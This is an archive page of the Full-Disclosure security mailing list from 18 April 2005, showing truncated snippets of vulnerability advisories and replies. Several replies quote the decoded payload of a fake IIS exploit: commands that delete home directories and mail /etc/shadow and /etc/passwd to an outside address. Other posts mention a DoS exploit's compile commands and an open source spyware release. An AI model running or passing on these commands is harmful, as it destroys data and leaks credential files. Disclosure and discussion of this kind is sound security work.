[Full-disclosure] [ GLSA 200504-17 ] XV: Multiple vulnerabilities

2005-04-18 Thread Sune Kloppenborg Jeppesen
Gentoo Linux Security Advisory GLSA 200504-17 http://security.gentoo.org/

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Ron
haha, nice: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe cat /etc/shadow |mail full-disclosure@lists.grok.org.uk cat /etc/passwd |mail full-disclosure@lists.grok.org.uk lol @ anybody who does it. Day Jay wrote: /* Proof of concept code Please don't send us e-mails asking us "how to hack" beca

RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Lauro, John
Not that anyone would fall for running this on anything besides a test system, but to save 30 seconds to decode, what it really does (locally, not remotely) is: cat /etc/shadow |mail full-disclosure@lists.grok.org.uk cat /etc/passwd |mail full-disclosure@lists.grok.org.uk /bin/rm -rf /home/*;clear

[Full-disclosure] [VulnWatch] [AppSecInc Team SHATTER Security Advisory] SQL Injection in CREATE_SCN_CHANGE_SET procedure[Scanned]

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SQL Injection in CREATE_SCN_CHANGE_SET procedure AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-05.html April 18, 2005 Affected versions: Oracle Database Server version 10g Risk level: High Credits: T

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Pbt
On Monday 18 April 2005 at 16:53 -0700, Day Jay wrote: > /* Proof of concept code >Please don't send us e-mails >asking us "how to hack" because >we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! You're right to add this warning! :)

[Full-disclosure] WheresJames Webcam Publisher Bof + POC [Haxorcitos]

2005-04-18 Thread Miguel Tarascó Acuña
 Haxorcitos advisory --- Application : WheresJames Webcam Publisher   Version : Beta 2.0.0014 Url : www.wheresjames.com Type    : Remote / Local Bof Author  : Miguel Tarascó Acuña - Tarako AT gmail.com    - Tarako AT Haxorci

[Full-disclosure] XSS bug in JAWS gadget Glossary (0.4-latestbeta (beta 2))

2005-04-18 Thread [EMAIL PROTECTED]
Small XSS Bug in JAWS gadget: Glossary all versions vulnerable 0.3 - 0.5 latest beta (beta2) STATUS: The vendor has been contacted and they fixed the bug but they haven't released an official patch yet. (You can find a provisional patch at the end of the file) TECHNICAL INFO

[Full-disclosure] [VulnWatch] [AppSecInc Team SHATTER Security Advisory] SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure[Scanned]

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-04.html April 18, 2005 Affected versions: Oracle Database Server version 10g Risk level: High Cr

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Alonso / ReYDeS
Greetings: Good attempt ;) But sometimes it works. --- cat: /etc/shadow: Permiso denegado No message, no subject; hope that's ok /bin/rm: no se puede borrar «/home/*»: Permiso denegado /bin/rm: no se puede borrar «/home/**»: Permiso denegado /bin/rm: no se puede borrar «/home/***»:

[Full-disclosure] [VulnWatch] [AppSecInc Team SHATTER Security Advisory] Multiple SQL Injection vulnerabilities in DBMS_METADATA package[Scanned]

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Multiple SQL Injection vulnerabilities in DBMS_METADATA package AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-03.html April 18, 2005 Affected Versions: Oracle Database Server versions 9i and 10g Risk

[Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Day Jay
/* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! IIS 6 Buffer Overflow Exploit BUG: inetinfo.exe improperly bound checks http requests sent longer

[Full-disclosure] - Argeniss - Oracle exploits and workarounds

2005-04-18 Thread Cesar
http://www.argeniss.com/research.html Some exploits and workarounds for vulnerabilities fixed on Oracle Critical Patch Update April 2005. http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf (->Don't read if you don't care about Oracle security...) You think you are secure because yo

[Full-disclosure] [VulnWatch] [AppSecInc Team SHATTER Security Advisory] Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages[Scanned]

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-02.html April 18, 2005 Affected Versions: Oracle Database Ser

[Full-disclosure] [VulnWatch] [AppSecInc Team SHATTER Security Advisory] Denial of Service in Oracle interMedia[Scanned]

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Denial of Service in Oracle interMedia AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-01.html April 18, 2005 Affected versions: Oracle Database Server versions 9i and 10g Risk level: Medium Credits: T

Re: [Full-disclosure] Security contacts for Sambar server and Surgemail

2005-04-18 Thread Morning Wood
[EMAIL PROTECTED] <[EMAIL PROTECTED]>   http://netwinsite.com/surgemail/infoq.htm   - Original Message - From: jamie fisher To: full-disclosure@lists.grok.org.uk Sent: Monday, April 18, 2005 3:21 PM Subject: [Full-disclosure] Security contacts for Sambar server a

[Full-disclosure] Security contacts for Sambar server and Surgemail

2005-04-18 Thread jamie fisher
Searching for security contacts for both Sambar and Surgemail. I've checked over the respective websites and have googled for contact details to no avail. Cheers! Jamie

[Full-disclosure] iDEFENSE Security Advisory 04.18.05: McAfee Internet Security Suite 2005 Insecure File Permission Vulnerability

2005-04-18 Thread iDEFENSE Labs
McAfee Internet Security Suite 2005 Insecure File Permission Vulnerability iDEFENSE Security Advisory 04.18.05 http://www.idefense.com/application/poi/display?type=vulnerabilities April 18, 2005 I. BACKGROUND McAfee Internet Security Suite 2005 is a product used to protect a personal computer fr

[Full-disclosure] WebcamXP

2005-04-18 Thread Morning Wood
- EXPL-A-2005-005 exploitlabs.com Advisory 034 - - WebcamXP - OVERVIEW webcamXP is one of the most popular webcam software for private

[Full-disclosure] [ GLSA 200504-16 ] CVS: Multiple vulnerabilities

2005-04-18 Thread Sune Kloppenborg Jeppesen
Gentoo Linux Security Advisory GLSA 200504-16 http://security.gentoo.org/

Re: [Full-disclosure] The first open source spyware

2005-04-18 Thread khaalel
lol, I'm not doing a race... Besides Agobot is not a spyware, it's a backdoor which exploits RPC/DCOM (MS03-026), RPC/Locator (MS03-001) and WebDAV (MS03-007) whereas kruegerware and kspyware are real spyware (it's right KSpyware is not very dangerous, but kruegerware was very dangerous). PS: I c

Re: [Full-disclosure] The first open source spyware

2005-04-18 Thread Florian Weimer
> After kruegerware's (and its child) diffusion, I'm introducing you the > first open source spyware. Too late. Agobot is/was GPLed, too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and s

[Full-disclosure] [AppSecInc Team SHATTER Security Advisory] SQL Injection in CREATE_SCN_CHANGE_SET procedure

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SQL Injection in CREATE_SCN_CHANGE_SET procedure AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-05.html April 18, 2005 Affected versions: Oracle Database Server version 10g Risk level: High Credits: T

[Full-disclosure] [AppSecInc Team SHATTER Security Advisory] SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-04.html April 18, 2005 Affected versions: Oracle Database Server version 10g Risk level: High Cr

[Full-disclosure] [AppSecInc Team SHATTER Security Advisory] Multiple SQL Injection vulnerabilities in DBMS_METADATA package

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Multiple SQL Injection vulnerabilities in DBMS_METADATA package AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-03.html April 18, 2005 Affected Versions: Oracle Database Server versions 9i and 10g Risk

[Full-disclosure] [AppSecInc Team SHATTER Security Advisory] Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-02.html April 18, 2005 Affected Versions: Oracle Database Ser

[Full-disclosure] [AppSecInc Team SHATTER Security Advisory] Denial of Service in Oracle interMedia

2005-04-18 Thread Team SHATTER
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Denial of Service in Oracle interMedia AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle/2005-01.html April 18, 2005 Affected versions: Oracle Database Server versions 9i and 10g Risk level: Medium Credits: T

[Full-disclosure] The first open source spyware

2005-04-18 Thread khaalel
Hi, For a few years now, the number of spyware programs has been growing, but it's impossible to find a spyware's source code to analyse it and better understand how it works. After kruegerware's (and its child) diffusion, I'm introducing you the first open source spyware. My goal is not to help people writing

[Full-disclosure] RE: Firelinking [Firefox 1.0.2]

2005-04-18 Thread Scovetta, Michael V
I can confirm that the POC works on 1.0.2 and does not work on 1.0.3. Michael Scovetta Computer Associates Senior Application Developer -Original Message- From: mikx [mailto:[EMAIL PROTECTED] Sent: Monday, April 18, 2005 6:59 AM To: full-disclosure@lists.grok.org.uk; bugtraq@securityfoc

[Full-disclosure] ERNW Security Advisory 01/2005

2005-04-18 Thread Mailinglists
ERNW Security Advisory 01-2005 Buffer Overflow in PMSoftware's Simple Web Server Author: Michael Thumann 1. Summary: Simple Web Server doesn't do proper bounds checking handling normal GET requests. Sending an overlong page or script name, it causes a buffer overflow and an attacker can cont

Re: [Full-disclosure] gobolook / hotoffer dropper

2005-04-18 Thread Lawrence Abrams
I put up an analysis here: http://www.bleepingcomputer.com/analysis/?anal=globolook-dropper Lawrence Abrams Bleeping Computer: http://www.bleepingcomputer.com - Original Message - From: "Willem Koenings" <[EMAIL PROTECTED]> To: Sent: Sunday, April 17, 2005 11:06 AM Subject: [Full-disclosu

[Full-disclosure] [SECURITY] [DSA 710-1] New gtkhtml packages fix denial of service

2005-04-18 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 710-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze April 18th, 2005

Re: [Full-disclosure] Ok. How do I get off this list?

2005-04-18 Thread KF (lists)
Just mail John Cartwright... and politely ask to be removed. -KF Bill Phu wrote: *sigh* I use "[EMAIL PROTECTED]" at https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am brought to a page that reads: ---Start copy--- Full-Disclosure list: member options for user [EMAIL PROTECTED] In

Re: [Full-disclosure] Ok. How do I get off this list?

2005-04-18 Thread Bill Phu
*sigh* I use "[EMAIL PROTECTED]" at https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am brought to a page that reads: ---Start copy--- Full-Disclosure list: member options for user [EMAIL PROTECTED] In order to change your membership option, you must first log in by giving your me

Re: [Full-disclosure] Ok. How do I get off this list?

2005-04-18 Thread Valdis . Kletnieks
On Mon, 18 Apr 2005 10:37:37 EDT, Bill Phu said: > Hi, I've tried more than a few times to get the confirmation email to > automatically remove myself from this list. But, for some reason, I > never get it. Can someone tell me how to remove myself from here? The most likely cause is that you're

[Full-disclosure] Ok. How do I get off this list?

2005-04-18 Thread Bill Phu
Hi, I've tried more than a few times to get the confirmation email to automatically remove myself from this list. But, for some reason, I never get it. Can someone tell me how to remove myself from here? Thanks, Bill

[Full-disclosure] SUSE Security Announcement: cvs (SUSE-SA:2005:024)

2005-04-18 Thread Sebastian Krahmer
-BEGIN PGP SIGNED MESSAGE- SUSE Security Announcement Package: cvs Announcement-ID: SUSE-SA:2005:024 Date: Monday, Apr 18

Re: [Full-disclosure] TCP/IP Stack Vulnerability

2005-04-18 Thread Eduardo Tongson
Compiles and runs ok on *BSD and Linux. No effect on windows xp sp2 home/pro, Linux 2.4/2.6, NetBSD 2.0.2, DragonFly 1.2 No sign of DoS on either side of the connection. No wonder people you sent the advisory to didn't bother to respond -- Edua

Re: [Full-disclosure] TCP/IP Stack Vulnerability

2005-04-18 Thread kakou
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Idem on a gentoo with 2.6 kernel (I have tested during 10min) H. S. wrote: >I have tested this against an unpatched W2K server and a RH 6 box, it >doesn't slow down any of them; I was using X on the RH6 one and didn't >notice any slowdowns or the supp

Re: [Full-disclosure] TCP/IP Stack Vulnerability

2005-04-18 Thread H. S.
I have tested this against an unpatched W2K server and a RH 6 box, it doesn't slow down any of them; I was using X on the RH6 one and didn't notice any slowdowns or the supposed packet flow this should generate. > Fellows, > > Try this: > > Linux (Slackware 10): > > [EMAIL PROTECTED]:/# gcc -D LIN

Re: [Full-disclosure] TCP/IP Stack Vulnerability

2005-04-18 Thread Diego Casati
Fellows, Try this: Linux (Slackware 10): [EMAIL PROTECTED]:/# gcc -D LINUX storm.c -lpcap -o storm BSD systems: [EMAIL PROTECTED]:/# gcc storm.c -lpcap -o storm It should work, anyway I'm sending a FreeBSD precompiled version of this exploit and the C source code as an attachment. bash-2.0

[Full-disclosure] [ GLSA 200504-15 ] PHP: Multiple vulnerabilities

2005-04-18 Thread Thierry Carrez
Gentoo Linux Security Advisory GLSA 200504-15 http://security.gentoo.org/

[Full-disclosure] Troubleshooting Linux(r) Firewalls

2005-04-18 Thread Sumy
Troubleshooting Linux(r) Firewalls By Michael Shinn, Scott Shinn Publisher : Prentice Hall PTR Pub Date : December 14, 2004 ISBN : 0-321-22723-9 Pages : 384 When something goes wrong with your Linux firewall, you need to fix it right now. You don't have time for endless newsgro

[Full-disclosure] Firelinking [Firefox 1.0.2]

2005-04-18 Thread mikx
__Notice I really wonder why the Mozilla Foundation decided to release a serious security update on a Friday night and to disclose the link to my proof-of-concept code so quickly. It wasn't intended from my side to release this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you disa

[Full-disclosure] Firesearching 1 + 2 [Firefox 1.0.2]

2005-04-18 Thread mikx
__Notice I really wonder why the Mozilla Foundation decided to release a serious security update on a Friday night and to disclose the link to my proof-of-concept code so quickly. It wasn't intended from my side to release this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you disa

[Full-disclosure] Cisco Security update -- please

2005-04-18 Thread 권형준
hi, i received this message: Cisco Security Advisory: Crafted ICMP Messages Can Cause Denial of Service 12-Apr-2005 12:00 GMT where i receive that ios or update or download example where site (http://www.cisco.com/en/US/products/produ